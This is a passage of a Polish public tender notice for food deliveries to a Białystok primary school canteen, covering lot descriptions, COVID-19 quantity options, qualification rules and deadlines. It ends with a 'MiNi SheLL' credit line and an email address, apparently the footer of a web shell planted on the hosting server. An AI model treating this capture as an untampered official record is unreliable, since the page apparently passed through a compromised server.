w Formularzu cenowym stanowiącym załącznik nr 4 do Formularza Oferty. Opcja jest uprawnieniem Zamawiającego, z którego może skorzystać w okolicznościach spowodowanych spadkiem zapotrzebowania na wyżywienie z powodu zmiany liczby żywionych osób i/lub nieobecności osób korzystających ze stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok. W przypadku skorzystania przez Zamawiającego z wymienionego uprawnienia, Wykonawcy nie przysługują żadne roszczenia z tego tytułu, w szczególności roszczenia finansowe.<br/>2)	Z uwagi na pandemię COVID-19, a w szczególności wprowadzenia obostrzeń związanych z pandemią COVID-19 takich jak zamknięcie szkół, które zmniejszają zapotrzebowanie stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok w produkty spożywcze Zamawiający zastrzega sobie opcję w postaci zmniejszenia zakresu ilościowego Części 4 zamówienia, wskazanego w Formularzu cenowym dla Części 4 zamówienia maksymalnie o 90% z prawem do proporcjonalnego zmniejszenia wynagrodzenia Wykonawcy. W związku z powyższym Zamawiający gwarantuje Wykonawcy wykorzystanie minimum 10% limitu ilościowego Części 4 zamówienia, wskazanego w Formularzu cenowym dla Części 4 zamówienia. W przypadku skorzystania przez Zamawiającego z wymienionego uprawnienia, Wykonawcy nie przysługują żadne roszczenia z tego tytułu, w szczególności roszczenia finansowe. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5 – Dostawa nabiału i produktów mleczarskich.<br/>1)	Część 5 zamówienia obejmuje sukcesywną dostawę nabiału i produktów mleczarskich do stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok.<br/>2)	Wymagane ilości nabiału i produktów mleczarskich oraz szczegółowy opis przedmiotu Części 5 zamówienia określono w Formularzu cenowym stanowiącym załącznik nr 5 do Formularza Oferty (załącznik nr 1 do IDW - Tom III SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1)	Z zastrzeżeniem pkt 4, Zamawiający zastrzega sobie możliwość skorzystania w okresie obowiązywania Umowy z opcji w postaci zmniejszenia zakresu ilościowego Części 5 zamówienia, wskazanego w Formularzu cenowym stanowiącym załącznik nr 5 do Formularza Oferty maksymalnie o 40% z prawem do proporcjonalnego zmniejszenia wynagrodzenia Wykonawcy. W związku z powyższym Zamawiający gwarantuje Wykonawcy wykorzystanie minimum 60% limitu ilościowego Części 5 zamówienia, wskazanego w Formularzu cenowym stanowiącym załącznik nr 5 do Formularza Oferty. Opcja jest uprawnieniem Zamawiającego, z którego może skorzystać w okolicznościach spowodowanych spadkiem zapotrzebowania na wyżywienie z powodu zmiany liczby żywionych osób i/lub nieobecności osób korzystających ze stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok. W przypadku skorzystania przez Zamawiającego z wymienionego uprawnienia, Wykonawcy nie przysługują żadne roszczenia z tego tytułu, w szczególności roszczenia finansowe.<br/>2)	Z uwagi na pandemię COVID-19, a w szczególności wprowadzenia obostrzeń związanych z pandemią COVID-19 takich jak zamknięcie szkół, które zmniejszają zapotrzebowanie stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok w produkty spożywcze Zamawiający zastrzega sobie opcję w postaci zmniejszenia zakresu ilościowego Części 5 zamówienia, wskazanego w Formularzu cenowym dla Części 5 zamówienia maksymalnie o 90% z prawem do proporcjonalnego zmniejszenia wynagrodzenia Wykonawcy. W związku z powyższym Zamawiający gwarantuje Wykonawcy wykorzystanie minimum 10% limitu ilościowego Części 5 zamówienia, wskazanego w Formularzu cenowym dla Części 5 zamówienia. W przypadku skorzystania przez Zamawiającego z wymienionego uprawnienia, Wykonawcy nie przysługują żadne roszczenia z tego tytułu, w szczególności roszczenia finansowe. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 6 – Dostawa warzyw, owoców i jaj.<br/>1)	Część 6 zamówienia obejmuje sukcesywną dostawę warzyw, owoców i jaj do stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok.<br/>2)	Wymagane ilości warzyw, owoców i jaj oraz szczegółowy opis przedmiotu Części 6 zamówienia określono w Formularzu cenowym stanowiącym załącznik nr 6 do Formularza Oferty (załącznik nr 1 do IDW - Tom III SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03220000-9 - Warzywa, owoce i orzechy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1)	Z zastrzeżeniem pkt 2, Zamawiający zastrzega sobie możliwość skorzystania w okresie obowiązywania Umowy z opcji w postaci zmniejszenia zakresu ilościowego Części 6 zamówienia, wskazanego w Formularzu cenowym stanowiącym załącznik nr 6 do Formularza Oferty maksymalnie o 40% z prawem do proporcjonalnego zmniejszenia wynagrodzenia Wykonawcy. W związku z powyższym Zamawiający gwarantuje Wykonawcy wykorzystanie minimum 60% limitu ilościowego Części 6 zamówienia, wskazanego w Formularzu cenowym stanowiącym załącznik nr 6 do Formularza Oferty. Opcja jest uprawnieniem Zamawiającego, z którego może skorzystać w okolicznościach spowodowanych spadkiem zapotrzebowania na wyżywienie z powodu zmiany liczby żywionych osób i/lub nieobecności osób korzystających ze stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok. W przypadku skorzy-stania przez Zamawiającego z wymienionego uprawnienia, Wykonawcy nie przysługują żadne roszczenia z tego tytułu, w szczególności roszczenia finansowe.<br/>2)	Z uwagi na pandemię COVID-19, a w szczególności wprowadzenia obostrzeń związanych z pandemią COVID-19 takich jak zamknięcie szkół, które zmniejszają zapotrzebowanie stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok w produkty spożywcze Zamawiający zastrzega sobie opcję w postaci zmniejszenia zakresu ilościowego Części 6 zamówienia, wskazanego w Formularzu cenowym dla Części 6 zamówienia maksymalnie o 90% z prawem do proporcjonalnego zmniejszenia wynagrodzenia Wykonawcy. W związku z powyższym Zamawiający gwarantuje Wykonawcy wykorzystanie minimum 10% limitu ilościowego Części 6 zamówienia, wskazanego w Formularzu cenowym dla Części 6 zamówienia. W przypadku skorzy-stania przez Zamawiającego z wymienionego uprawnienia, Wykonawcy nie przysługują żadne roszczenia z tego tytułu, w szczególności roszczenia finansowe. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 7 – Dostawa ryb i innych mrożonek.<br/>1)	Część 7 zamówienia obejmuje sukcesywną dostawę ryb i innych mrożonek do stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok.<br/>2)	Wymagane ilości ryb i innych mrożonek oraz szczegółowy opis przedmiotu Części 7 zamówienia określono w Formularzu cenowym stanowiącym załącznik nr 7 do Formularza Oferty (załącznik nr 1 do IDW - Tom III SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15220000-6 - Ryby mrożone, filety rybne i pozostałe mięso ryb</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15331170-9 - Warzywa mrożone</p> <p class="mb-0">15800000-6 - Różne produkty spożywcze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1)	Z zastrzeżeniem pkt 4, Zamawiający zastrzega sobie możliwość skorzystania w okresie obowiązywania Umowy z opcji w postaci zmniejszenia zakresu ilościowego Części 7 zamówienia, wskazanego w Formularzu cenowym stanowiącym załącznik nr 7 do Formularza Oferty maksymalnie o 40% z prawem do proporcjonalnego zmniejszenia wynagrodzenia Wykonawcy. W związku z powyższym Zamawiający gwarantuje Wykonawcy wykorzystanie minimum 60% limitu ilościowego Części 7 zamówienia, wskazanego w Formularzu cenowym stanowiącym załącznik nr 7 do Formularza Oferty. Opcja jest uprawnieniem Zamawiającego, z którego może skorzystać w okolicznościach spowodowanych spadkiem zapotrzebowania na wyżywienie z powodu zmiany liczby żywionych osób i/lub nieobecności osób korzystających ze stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok. W przypadku skorzystania przez Zamawiającego z wymienionego uprawnienia, Wykonawcy nie przysługują żadne roszczenia z tego tytułu, w szczególności roszczenia finansowe.<br/>2)	Z uwagi na pandemię COVID-19, a w szczególności wprowadzenia obostrzeń związanych z pandemią COVID-19 takich jak zamknięcie szkół, które zmniejszają zapotrzebowanie stołówki Szkoły Podstawowej nr 28 ul. Warmińska 55, 15-553 Białystok w produkty spożywcze Zamawiający zastrzega sobie opcję w postaci zmniejszenia zakresu ilościowego Części 7 zamówienia, wskazanego w Formularzu cenowym dla Części 7 zamówienia maksymalnie o 90% z prawem do proporcjonalnego zmniejszenia wynagrodzenia Wykonawcy. W związku z powyższym Zamawiający gwarantuje Wykonawcy wykorzystanie minimum 10% limitu ilościowego Części 7 zamówienia, wskazanego w Formularzu cenowym dla Części 7 zamówienia. W przypadku skorzystania przez Zamawiającego z wymienionego uprawnienia, Wykonawcy nie przysługują żadne roszczenia z tego tytułu, w szczególności roszczenia finansowe. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Na podstawie art. 274 ust. 1 ustawy Pzp oraz rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. poz. 2415)<br/>Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>1/w celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.<br/>Na podstawie art. 274 ust. 4 Pzp Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17<br/>lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, <br/>o którym mowa w art. 125 ust. 1 ustawy Pzp (Załącznik nr 2 do IDW) dane umożliwiające dostęp do tych środków.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani, na wezwanie złożyć podmiotowe środki dowodowe, o których mowa wyżej, przy czym podmiotowe środki dowodowe, składa każdy z Wykonawców oddzielnie.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania Oferty nie wynika bezpośrednio z właściwego rejestru.<br/>2) oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp – dotyczy Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani, na wezwanie złożyć dokumenty i oświadczenia składające się na podmiotowe środki dowodowe wskazane w SWZ, przy czym podmiotowe środki dowodowe składa każdy z Wykonawców oddzielnie. Zamawiający żąda od Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia dołączenia do Oferty podpisanego przez osoby do tego upoważnione pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy. Zgodnie z art. 117 ust. 4 ustawy Pzp w przypadku, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy lub usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany postanowień umowy określone zostały w SWZ - Projektowane postanowienia umowy – Wzór umowy stanowi Tom II SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP (https://obywatel.gov.pl/nforms/ezamowienia) i udostępnionego również na miniPortalu w zakładce „Formularze do komunikacji”</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-21 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Wykonawca zobowiązany jest wykonać przedmiot zamówienia (dotyczy wszystkich Części zamówienia) przez 12 miesięcy, jednak nie wcześniej niż od 01.09.2022 r. (wyłączając okres wakacji, ferii zimowych, przerw świątecznych lub innych sytuacji, których nie dało się wcześniej przewidzieć, w szczególności wprowadzenia obostrzeń związanych z pandemią COVID-19).<br/>2. Z postępowania o udzielenie zamówienia Zamawiający wykluczy Wykonawcę na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz. 835):<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim<br/>beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką<br/>dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3.

Creat By MiNi SheLL
Email: jattceo@gmail.com